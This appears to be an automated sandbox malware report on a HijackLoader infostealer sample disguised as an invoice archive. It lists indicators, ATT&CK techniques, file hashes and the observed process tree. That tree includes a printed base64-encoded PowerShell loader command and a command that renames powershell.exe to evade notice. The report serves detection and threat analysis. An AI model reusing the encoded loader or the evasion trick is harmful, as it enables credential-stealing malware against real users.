hijackloader | 48fa854012e6abef23589909ec3293efc3df0ab2b5ef4406ccaf7ee0b68464c6

Resubmissions

09-10-2024 15:25

241009-stsvvaxhjj 10

09-10-2024 15:15

241009-sm4nrssckf 10

Analysis

max time kernel
438s
max time network
443s
platform
windows10-2004_x64
resource
win10v2004-20241007-es
resource tags

arch:x64arch:x86image:win10v2004-20241007-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
09-10-2024 15:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

facturagm-27725407957355783426.zip
Size

49.2MB
MD5

79e9ed02ff9d617c1732776ff596f47a
SHA1

9e3dd3c140198fc5ff080dec7d610f5bb04d2e4a
SHA256

48fa854012e6abef23589909ec3293efc3df0ab2b5ef4406ccaf7ee0b68464c6
SHA512

7b418b82b6f8b7fb165ee2ca3a014ce94bd229a10d11fc141be8dea47a728e04670cfa795757d0ea6bf127db13952c4e4b1bc4ec3f25f623a5f108734b76d241
SSDEEP

1572864:4ltjOLVis6A90iwyhwLmWaBOZF+QLr45/rby0:4ltjORX9VnqaBOj96/Xy0

Score

10^/10

hijackloader collection discovery loader spyware stealer

Malware Config

Signatures

Detects HijackLoader (aka IDAT Loader) 3 IoCs

resource	yara_rule
behavioral1/files/0x0009000000023bbe-40.dat	family_hijackloader
behavioral1/files/0x0007000000023ce5-372.dat	family_hijackloader
behavioral1/files/0x0007000000023cec-386.dat	family_hijackloader

HijackLoader
HijackLoader is a multistage loader first seen in 2023.
loader hijackloader

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3676	4296	cmd.exe	89

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3464 created 3484	3464	facturagm-27725407957355783426.vbs.exe	56

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
3464	facturagm-27725407957355783426.vbs.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3464 set thread context of 2736	3464	facturagm-27725407957355783426.vbs.exe	100

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	facturagm-27725407957355783426.vbs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	WScript.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3464	facturagm-27725407957355783426.vbs.exe
3464	facturagm-27725407957355783426.vbs.exe
3464	facturagm-27725407957355783426.vbs.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeRestorePrivilege	2944	7zG.exe
Token: 35	2944	7zG.exe
Token: SeSecurityPrivilege	2944	7zG.exe
Token: SeSecurityPrivilege	2944	7zG.exe
Token: SeDebugPrivilege	3464	facturagm-27725407957355783426.vbs.exe
Token: SeDebugPrivilege	3464	facturagm-27725407957355783426.vbs.exe
Token: SeDebugPrivilege	2736	RegAsm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2944	7zG.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 3464	2336	WScript.exe	98
PID 2336 wrote to memory of 3464	2336	WScript.exe	98
PID 2336 wrote to memory of 3464	2336	WScript.exe	98
PID 3464 wrote to memory of 2736	3464	facturagm-27725407957355783426.vbs.exe	100
PID 3464 wrote to memory of 2736	3464	facturagm-27725407957355783426.vbs.exe	100
PID 3464 wrote to memory of 2736	3464	facturagm-27725407957355783426.vbs.exe	100
PID 3464 wrote to memory of 2736	3464	facturagm-27725407957355783426.vbs.exe	100
PID 3464 wrote to memory of 2736	3464	facturagm-27725407957355783426.vbs.exe	100
PID 3464 wrote to memory of 2736	3464	facturagm-27725407957355783426.vbs.exe	100
PID 3464 wrote to memory of 2736	3464	facturagm-27725407957355783426.vbs.exe	100
PID 3464 wrote to memory of 2736	3464	facturagm-27725407957355783426.vbs.exe	100

outlook_office_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3484
- C:\Windows\Explorer.exe
  C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426.zip
  2⤵
  PID:4560
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\" -spe -an -ai#7zMap27034:140:7zEvent4551
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2944
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2336
- - C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe
    "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe" -enc JABMAHcAZQBlAGcAagBqAGIAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABXAGsAZwBtAHcAawAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEwAdwBlAGUAZwBqAGoAYgBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBrAGcAbQB3AGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAFAAeAB6AHgAcgBrAGYAcQBiAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAApADsAJABLAGwAawBwAHUAZQBwAGMAZgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQARwBhAGkAdQBsACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFAAeAB6AHgAcgBrAGYAcQBiAG4ALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAYQBpAHUAbAAuAEMAbwBwAHkAVABvACgAIAAkAEsAbABrAHAAdQBlAHAAYwBmACAAKQA7ACQARwBhAGkAdQBsAC4AQwBsAG8AcwBlACgAKQA7ACQAUAB4AHoAeAByAGsAZgBxAGIAbgAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAA9ACAAJABLAGwAawBwAHUAZQBwAGMAZgAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATQBoAGgAaABrAHoAZwBlAG4AdAApADsAIAAkAEcAdQB2AGoAZwBvAHAAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQATQBoAGgAaABrAHoAZwBlAG4AdAApADsAIAAkAE8AcABkAGQAawAgAD0AIAAkAEcAdQB2AGoAZwBvAHAALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABPAHAAZABkAGsALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAE8AcABkAGQAawAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3464
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:2736

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1876

C:\Windows\system32\cmd.exe
cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe" /Y
1⤵
- Process spawned unexpected child process
PID:3676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o4qca3na.11f.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Managed\hgfs.dll

Filesize
89KB

MD5
a3ffaec3fd51d8bbf4c5f1575100b856

SHA1
a7dbe003681b48c6075cdae3d4ff2dcbeb51311f

SHA256
ff63474af99de3c2558228551cf869f01d77f96617cd40ef965691b984b96002

SHA512
12197073f3c6f3475efc3ea1bb32958e37803e4be9ed0199bfe65cdbd458a73d95037c03ce6894624abcd37618f36ab4e8614df1cbca799caa5f17808440f5f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\cardigan.mpeg

Filesize
878KB

MD5
dc93cc9611ad0f3955d945cb9fe49a2f

SHA1
4097a79a913448879ed22f79524fd0bc2fc4d542

SHA256
5f258c49d628f1feae9a2e6c446f2ea785c329f86705a324e0d077e832132d88

SHA512
7e84542818e10baafbd07b13ca99f1f183e871acd276a67cd9d09b3e99b7d57ab86590e8d005a8c623b6b4a79baf2be34e7977af3eed85a4e223dec78ec10fd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\glib-2.0.dll

Filesize
1.0MB

MD5
2c86ec2ba23eb138528d70eef98e9aaf

SHA1
246846a3fe46df492f0887a31f7d52aae4faa71a

SHA256
030983470da06708cc55fd6aca92df199a051922b580db5db55c8cb6b203b51b

SHA512
396a3883fa65d7c3a0af7d607001a6099316a85563147cb34fa9806c9a4b39cfa90c7fa9eb4456399977eb47438d10896d25ed5327ae7aa3e3ae28cd1d13701c

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\msvcr90.dll

Filesize
638KB

MD5
11d49148a302de4104ded6a92b78b0ed

SHA1
fd58a091b39ed52611ade20a782ef58ac33012af

SHA256
ceb0947d898bc2a55a50f092f5ed3f7be64ac1cd4661022eefd3edd4029213b0

SHA512
fdc43b3ee38f7beb2375c953a29db8bcf66b73b78ccc04b147e26108f3b650c0a431b276853bb8e08167d34a8cc9c6b7918daef9ebc0a4833b1534c5afac75e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\sqlite.dll

Filesize
243KB

MD5
96ea9810b13ae107a3efbc44452f1ddf

SHA1
e4db1816f5a16f1ff4b8b90453a875a9c3aed3ea

SHA256
794a456a593e50ecdbdb1c08687d9db7724db2597889883e9a32ee11ba0166cd

SHA512
0ff49e5112bd48eed297554f0d971ab07266564f6bcc80bfa7dbb66629579f4f8bb5509c4390714990e8c5d7dfea261a5626a117c3061c66424879b0b6ea69a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\toparch.svg

Filesize
1.2MB

MD5
5b23b0752f582a7ea16296a9238a568a

SHA1
aebd7767b37a28d5eaab02f4b5f7e982441f9269

SHA256
96d8470b767bce6fbc71e55c2c43980da104f9532f941e25e30ae3c8fb7b63e6

SHA512
5f7a7d287916ba99acfabd074576f7d2db585d594e202739d2cd492b679ba1899cdc27c7c744f8314f6cf030f6d9ca7a841e7fea68e00bee7757b353d0eca330

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\vcruntime140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Resources\msvcp90.dll

Filesize
557KB

MD5
90a32d8e07f7fb3d102eab1da28f0723

SHA1
0903911bbb5d00f68ba51895fa898b38a5453ded

SHA256
004ed24507dc7307cec1a3732fa57eabf19e918c3e1b54561e6cc01f554c0b77

SHA512
2c69586d5c5d2b4b5decf2bf479554c3d0ff5f5a6fbacb01b8583ea8d96d0ae9c850c30a0d43eb2ad1116be901578d15fe08fce3e505440c854082c208a79f1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Resources\vcruntime140_1.dll

Filesize
48KB

MD5
cf0a1c4776ffe23ada5e570fc36e39fe

SHA1
2050fadecc11550ad9bde0b542bcf87e19d37f1a

SHA256
6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47

SHA512
d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\level4.resS

Filesize
128KB

MD5
64d183ad524dfcd10a7c816fbca3333d

SHA1
5a180d5c1f42a0deaf475b7390755b3c0ecc951c

SHA256
5a666340f42f0f985772024d90a83d15c9a241a68d58205cd4afbb1a31f1621a

SHA512
3cab59dff09981f49d1070fba06a781439bb1ea2dae0cfcb937d9875bbe9e866be2c951cfc6a3ca4a92aea79dd3e9c4792a765f5a06f230a57dabcab2f0b3c1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\mozglue.dll

Filesize
222KB

MD5
536f3db0935e8a3e4a946cda6f641213

SHA1
0d59a21a15e3d7fdaed9549cae0d69b9bff3a1a3

SHA256
3a8263b607897e6754604e08b62b088ab2443df57146dee8f709193c454cd573

SHA512
016646f745d6ce3fa2e600dd3131805b7a0b1171fd5f59f53b9582128297c3a9bcd8ea20020fc1c2953f2cfe96b2e70d56a824b9e2bc2fc11422aec9243e66d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\app.asar.unpacked\chronicle.svg

Filesize
901KB

MD5
f5287c9ac6523fa9afc2096a5bcea901

SHA1
d9f5b46a8525ef7e90e9446a3b750677e5018718

SHA256
518bc674a4855d72a0163972be3e9776358dd2806e69ff5c846efc8424c4463d

SHA512
450bf0347f5098279bdb3b1f76951039bf59884d96107541e37ef3b3d3dd52bb1d3cf54451f8209ee6be79096bf6282fa0479f492e7e2a6dfa93a3c296b76bd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\app.asar.unpacked\msvcp140.dll

Filesize
564KB

MD5
1ba6d1cf0508775096f9e121a24e5863

SHA1
df552810d779476610da3c8b956cc921ed6c91ae

SHA256
74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823

SHA512
9887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\vmtools.dll

Filesize
617KB

MD5
65c3c2a741838474a592679cda346753

SHA1
043d80766dd4e49d8dca6ac72b04e09b5491fdc9

SHA256
4e5f2c54d9ecfe48999edfcce0de038948f8b20ff68e299c55d9a2d6f65713e8

SHA512
e5d8b308586ffa914f46b6766217eb12ad759853d25108db06170b870d0e8947e2befabc2843f76cb864b0f0135a8f2163b7c93fe644b293789919d1d07c4079

Download Submit
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs

Filesize
1.6MB

MD5
ef631a2d714c4ea5480e40163f23344f

SHA1
5a32baa3072836e76ea12006fb9a9d69ec10a6f3

SHA256
43f335930a2bb9df1e30bd3e8e10cab5bc4cd23c31b2db740c9649596821b4f1

SHA512
78c078d20091344c0efd0e740e1045454e3b261318c1eb9056f51ec82abec8a99b21194fb7a096d350ec23f76a1719501694d4b2bf5801903635d62c1cafe703

Download Submit
